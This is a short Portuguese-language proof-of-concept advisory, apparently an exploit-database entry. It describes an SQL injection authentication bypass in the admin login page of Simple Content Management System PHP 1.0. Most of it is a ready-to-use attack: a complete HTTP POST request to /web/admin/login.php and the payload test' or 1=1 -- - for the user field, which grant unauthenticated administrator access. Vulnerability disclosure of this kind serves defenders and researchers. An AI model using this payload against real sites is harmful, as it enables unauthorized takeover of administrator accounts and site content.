
Prova de conceito para bypass de autenticação por injeção SQL no Simple Content Management System PHP, permitindo que atacantes não autenticados obtenham acesso de administrador por meio de um parâmetro de usuário manipulado.
Existe uma vulnerabilidade de Injeção de SQL na página de login do administrador do
Sistema de Gerenciamento de Conteúdo Simples em PHP. O parâmetro user não é
sanitizado antes de ser passado para a consulta SQL, permitindo que um
atacante não autenticado contorne a autenticação e obtenha acesso total
de administrador.
/web/admin/login.phpusercode-projects.org
Sistema de Gerenciamento de Conteúdo Simples em PHP
1.0
POST /web/admin/login.php HTTP/1.1
Host: [target]
Content-Type: application/x-www-form-urlencoded
user=test'+or+1%3D1+--+-&password=test&submit=Login
ou apenas adicione isso na página de login

test' or 1=1 -- -

Um atacante remoto não autenticado pode contornar completamente o login do administrador sem conhecer nenhuma credencial, obtendo controle total sobre o painel do administrador, incluindo a adição de conteúdo.
Imad Alvi